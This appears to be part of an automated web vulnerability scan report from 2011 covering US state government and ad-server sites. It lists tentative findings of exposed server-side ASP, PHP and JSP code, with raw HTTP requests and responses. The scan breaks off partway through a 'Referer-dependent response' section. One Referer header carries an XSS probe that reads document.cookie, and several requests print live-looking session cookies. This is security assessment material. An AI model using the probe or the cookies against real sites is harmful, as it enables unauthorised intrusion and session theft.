<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...

16.15. https://www.humanservices.state.pa.us/compass.web/MenuItems/GeneralInfoFaq.aspx  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.humanservices.state.pa.us
Path:   /compass.web/MenuItems/GeneralInfoFaq.aspx

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /compass.web/MenuItems/GeneralInfoFaq.aspx HTTP/1.1
Host: www.humanservices.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: LangCode=EN; Image=HomePagePhoto_5.jpg; HTTP_TARGET=https://www.humanservices.state.pa.us/compass.web/MenuItems/CPSystemCompatibility.aspx; ASP.NET_SessionId=yr3x3j55tjb3vof0ovmzf2zt;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:38:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: LangCode=; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 53795


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   COMPASS
</tit
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...

16.16. https://www.humanservices.state.pa.us/compass.web/MenuItems/SiteMapAfs.aspx  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.humanservices.state.pa.us
Path:   /compass.web/MenuItems/SiteMapAfs.aspx

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /compass.web/MenuItems/SiteMapAfs.aspx HTTP/1.1
Host: www.humanservices.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: LangCode=EN; Image=HomePagePhoto_5.jpg; HTTP_TARGET=https://www.humanservices.state.pa.us/compass.web/MenuItems/CPSystemCompatibility.aspx; ASP.NET_SessionId=yr3x3j55tjb3vof0ovmzf2zt;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:38:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: LangCode=; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 32855


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   COMPASS
</tit
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...

16.17. https://www.humanservices.state.pa.us/compass.web/MenuItems/help.aspx  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.humanservices.state.pa.us
Path:   /compass.web/MenuItems/help.aspx

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /compass.web/MenuItems/help.aspx HTTP/1.1
Host: www.humanservices.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: LangCode=EN; Image=HomePagePhoto_5.jpg; HTTP_TARGET=https://www.humanservices.state.pa.us/compass.web/MenuItems/CPSystemCompatibility.aspx; ASP.NET_SessionId=yr3x3j55tjb3vof0ovmzf2zt;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:38:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: LangCode=; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 23714


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   COMPASS
</tit
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...

16.18. https://www.humanservices.state.pa.us/compass.web/Menuitems/ADACompliance.aspx  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.humanservices.state.pa.us
Path:   /compass.web/Menuitems/ADACompliance.aspx

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /compass.web/Menuitems/ADACompliance.aspx HTTP/1.1
Host: www.humanservices.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: LangCode=EN; Image=HomePagePhoto_5.jpg; HTTP_TARGET=https://www.humanservices.state.pa.us/compass.web/MenuItems/CPSystemCompatibility.aspx; ASP.NET_SessionId=yr3x3j55tjb3vof0ovmzf2zt;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:38:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 17507


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   COMPASS
</tit
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...

16.19. https://www.humanservices.state.pa.us/compass.web/Menuitems/BrowserCompat.aspx  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.humanservices.state.pa.us
Path:   /compass.web/Menuitems/BrowserCompat.aspx

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /compass.web/Menuitems/BrowserCompat.aspx HTTP/1.1
Host: www.humanservices.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: LangCode=EN; Image=HomePagePhoto_5.jpg; HTTP_TARGET=https://www.humanservices.state.pa.us/compass.web/MenuItems/CPSystemCompatibility.aspx; ASP.NET_SessionId=yr3x3j55tjb3vof0ovmzf2zt;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:38:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: LangCode=; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 21458


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Compatibilidad
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...

16.20. https://www.humanservices.state.pa.us/compass.web/Menuitems/Confidential.aspx  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://www.humanservices.state.pa.us
Path:   /compass.web/Menuitems/Confidential.aspx

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /compass.web/Menuitems/Confidential.aspx HTTP/1.1
Host: www.humanservices.state.pa.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: LangCode=EN; Image=HomePagePhoto_5.jpg; HTTP_TARGET=https://www.humanservices.state.pa.us/compass.web/MenuItems/CPSystemCompatibility.aspx; ASP.NET_SessionId=yr3x3j55tjb3vof0ovmzf2zt;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:38:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: LangCode=; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 40579


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   COMPASS
</tit
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strAgenciesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...
<li style="<%=s_strServicesWidth%>">
...[SNIP]...

16.21. http://www.nccourts.org/Common/JScript/Common.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.nccourts.org
Path:   /Common/JScript/Common.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /Common/JScript/Common.js HTTP/1.1
Host: www.nccourts.org
Proxy-Connection: keep-alive
Referer: http://www.nccourts.org/Citizens/GoToCourt/Default.asp?topic=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDASDQTAAR=PCICHPIBOGMIFCHDGPEAMKKM

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Sat, 30 Apr 2011 00:49:02 GMT
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 28 May 2010 18:35:22 GMT
ETag: "1484d58794feca1:93f"
Content-Length: 2889

//<![CDATA[

// These variables are global to the included page
var bIE = false;
var bIE4 = false;
var bIE5 = false;
var bIE55 = false;
var bIE6 = false;
var bNS = false;
var bNS4 = false;
v
...[SNIP]...
mployeeLink()
{
   // The Request.ServerVariables("REMOTE_ADDR") is passed to this function
   // because JavaScript cannot access the REMOTE_ADDR

   // For Example:
   // onclick="goToEmployeeLink('<%Response.Write(Request.ServerVariables("REMOTE_ADDR"))%>');return true"                
               
   var argsPassed = goToEmployeeLink.arguments

   var ipAddress = argsPassed[0]
   // alert(ipAddress)
   // alert(ipAddress.substr(0,3))
               
   //if ip pattern (first 3 chars)
...[SNIP]...

16.22. http://www.portal.state.pa.us/imageserver/plumtree/common/private/js/jsxml/LATEST/PTXML.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.portal.state.pa.us
Path:   /imageserver/plumtree/common/private/js/jsxml/LATEST/PTXML.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /imageserver/plumtree/common/private/js/jsxml/LATEST/PTXML.js HTTP/1.1
Host: www.portal.state.pa.us
Proxy-Connection: keep-alive
Referer: http://pa.gov/portal/server.pt/community/pa_gov/2966
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Mon, 30 Mar 2009 21:38:45 GMT
Accept-Ranges: bytes
ETag: "80a0ece67fb1c91:e2b"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 29 Apr 2011 22:49:47 GMT
Content-Length: 65562


PTHTTPTransport = function() {}

PTHTTPTransport.VERSION = '334989';
PTHTTPTransport.CCMODE_QUEUE        = 'queue';        
PTHTTPTransport.CCMODE_ASYNC        = 'async';        
PTHTTPTransport.CCMODE_SYNC        = 'sync
...[SNIP]...
<');
   if (str.substring(start,start + 3) == '<?x' || str.substring(start,start + 3) == '<?X' )
   {
       var close = str.indexOf('?>
');
       str = str.substring(close + 2,str.length);
   }
   var start = str.indexOf('<!DOCTYPE');
   if (start != -1)
   {
       var close = str.indexOf('>
...[SNIP]...

16.23. http://www.txdot.gov/txdoteforms/GetForm  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.txdot.gov
Path:   /txdoteforms/GetForm

Issue detail

The application appears to disclose some server-side source code written in JSP and ASP.

Request

GET /txdoteforms/GetForm HTTP/1.1
Host: www.txdot.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 30 Apr 2011 12:41:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Last-Modified: Fri, 20 Aug 2010 16:31:06 GMT
Content-Length: 2224
Content-Language: en-US
Server: WebSphere Application Server/6.1

<%@ page isErrorPage="true"%>

<html>

<head>
   <title>TxDOT Error Page</title>
   
</head>

<body>
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TR>
       <TD><img border="0"
...[SNIP]...
<td>&nbsp;&nbsp;<%= request.getAttribute("datetime")%></td>
...[SNIP]...
<td>&nbsp;&nbsp;<%= request.getAttribute("appid")%></td>
...[SNIP]...
<td>&nbsp;&nbsp;<%= request.getAttribute("formname")%></td>
...[SNIP]...

16.24. http://www.utah.gov/js/DD_roundies_0.0.2a-min.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.utah.gov
Path:   /js/DD_roundies_0.0.2a-min.js

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /js/DD_roundies_0.0.2a-min.js HTTP/1.1
Host: www.utah.gov
Proxy-Connection: keep-alive
Referer: http://www.utah.gov/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 30 Apr 2011 11:14:52 GMT
Server: Apache
Last-Modified: Mon, 11 Oct 2010 22:27:40 GMT
ETag: "895e75-20ed-4925ede3d8f00"
Accept-Ranges: bytes
Content-Length: 8429
Content-Type: application/javascript

/**
* DD_roundies, this adds rounded-corner CSS in standard browsers and VML sublayers in IE that accomplish a similar appearance when comparing said browsers.
* Author: Drew Diller
* Email: drew.d
...[SNIP]...
eturn p}('t K={16:\'K\',1L:G,1M:G,1d:G,2f:y(){u(D.2g!=8&&D.1N&&!D.1N[q.16]){q.1L=M;q.1M=M}17 u(D.2g==8){q.1d=M}},2h:D.2i,1O:[],1b:{},2j:y(){u(q.1L||q.1M){D.1N.2L(q.16,\'2M:2N-2O-2P:x\')}u(q.1d){D.2Q(\'<?2R 2S="\'+q.16+\'" 2T="#1P#2k" ?>\')}},2l:y(){t a=D.1k(\'z\');D.2m.1w.1Q(a,D.2m.1w.1w);u(a.12){2n{t b=a.12;b.1x(q.16+\'\\\\:*\',\'{1l:2U(#1P#2k)}\');q.12=b}2o(2p){}}17{q.12=a}},1x:y(a,b,c){u(1R b==\'1S\'||b===2V){b=0}u(b.2W.2q().1y(\'
...[SNIP]...

17. Referer-dependent response  previous  next
There are 6 instances of this issue:


17.1. http://ads.adbrite.com/adserver/vdi/711384  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/711384

Request 1

GET /adserver/vdi/711384?d=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=0.2983929158654064 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.kodakgallery.com/gallery/lp/2010/visit_florida/vacation_photos.jsp?e81c7*/alert(document.cookie)//4c687dfaa6f=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; ut="1%3AHYxBDoMgEAD%2FsmcOLiht%2FI0oRtPNWsCWoOvfJV5nJnPCX0N%2FwseXvMUpQQ8hmCMLhreJJFqwU0mniILfMjPLIIj7oRJ5olq5PW%2FyEuuMGheya7EtVzw1v2qlAQVuYPZxfd5wXTc%3D"

Response 1

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 30 Apr 2011 15:08:25 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
Set-Cookie: srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Sun, 01-May-2011 15:08:25 GMT
Set-Cookie: rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBir0eyREyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; path=/; domain=.adbrite.com; expires=Fri, 29-Jul-2011 15:08:25 GMT
Set-Cookie: ut="1%3AHcxBDoMgEEDRu8yahQNKG28jitF0MhawJeh4d4nb95N%2Fwl9Df8LHl7zFKUEPSaeIgt8yM8sgiPuhQjBHFgxvE0m0YKcSeaIqbs%2BbvMQ6o8aF7Fpsy5Wn5lerNKDADcw%2Brs8brusG"; path=/; domain=.adbrite.com; expires=Tue, 27-Apr-2021 15:08:25 GMT
Set-Cookie: vsd=0@1@4dbc25e9@www.kodakgallery.com; path=/; domain=.adbrite.com; expires=Mon, 02-May-2011 15:08:25 GMT
Set-Cookie: rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; path=/; domain=.adbrite.com; expires=Fri, 29-Jul-2011 15:08:25 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

Request 2

GET /adserver/vdi/711384?d=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&cb=0.2983929158654064 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; rb=0:684339:20838240:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:742697:20828160:2931142961646634775:0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0; rb2=CjQKBjY4NDMzORjljcu5CyIkNGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjgwNjIwNRjAyYaZFSIkMGMyYWVkZTYtNmJiNi0xMWUwLThmZTYtMDAyNTkwMGE4ZmZlEAE; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; ut="1%3AHYxBDoMgEAD%2FsmcOLiht%2FI0oRtPNWsCWoOvfJV5nJnPCX0N%2FwseXvMUpQQ8hmCMLhreJJFqwU0mniILfMjPLIIj7oRJ5olq5PW%2FyEuuMGheya7EtVzw1v2qlAQVuYPZxfd5wXTc%3D"

Response 2

HTTP/1.1 200 OK
Accept-Ranges: none
Cache-Control: no-cache, no-store, must-revalidate
Content-Type: image/gif
Date: Sat, 30 Apr 2011 15:08:52 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Server: XPEHb/1.0
